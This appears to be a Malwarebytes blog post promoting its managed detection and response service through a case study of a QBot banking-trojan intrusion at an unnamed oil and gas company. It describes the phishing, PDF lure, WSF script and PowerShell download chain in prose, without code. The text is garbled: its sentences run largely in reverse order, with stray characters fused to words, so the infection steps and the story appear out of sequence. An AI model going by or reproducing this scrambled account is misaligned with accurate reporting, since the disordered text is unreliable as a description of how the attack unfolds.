Once QBot runs, it issues a PING command to check for an internet connection. This script tries each URL until a file is downloaded to the Windows Temp folder (%TEMP%) and executed. The heavily obfuscated script contains a mix of JS and VBScript code that, when run, triggers a PowerShell that then downloads the QBot DLL from a list of hardcoded URLs. Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the 'open' button." Clicking the button downloads a ZIP file containing the WSF script. QBot attacks start with a reply-chain phishing email, when threat actors reply to a chain of emails with a malicious link or attachment.Ī sample reply-chain phishing email in French, carrying a PDF attachment disguised as a cancellation letter. The QBot campaign illustrated (Source: Jerome Segura | Malwarebytes Labs) QBot has recently been observed being distributed as part of a phishing campaign using PDFs and Windows Script Files (WSF). What's more, it also facilitates remote access to the compromised machines. QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. The culprit was Qakbot (also known as QBot). On a date left undisclosed for security reasons, a reputable oil and gas company we’ll refer to as Company 1 experienced an intrusion in their network. Malwarebytes MDR is a service that provides around-the-clock monitoring of an organization’s environment for signs of a cyberattack.īut talk is cheap: let’s look at a real time where Malwarebytes MDR successfully helped a company detect and respond to a potent banking Trojan known as QBot. That’s where Malwarebytes Managed Detection and Response (MDR) comes in. The bad news for small-to-medium sized businesses (SMBs): Manually intensive and costly threat-hunting tools usually restrict this practice to larger organizations with an advanced cybersecurity model and a well-staffed security operations center (SOC). Threat hunting helps find and remediate highly-obfuscated threats like these that quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.” Data has been harvested or ransomware has been deployed. The median amount of time between system compromise and detection is 21 days.īy that time, it’s often too late. Just consider the fact that, when a threat actor breaches a network, they don’t attack right away. At Malwarebytes, we talk a lot about the importance of threat hunting for SMBs-and not for no good reason, either.
0 Comments
Leave a Reply. |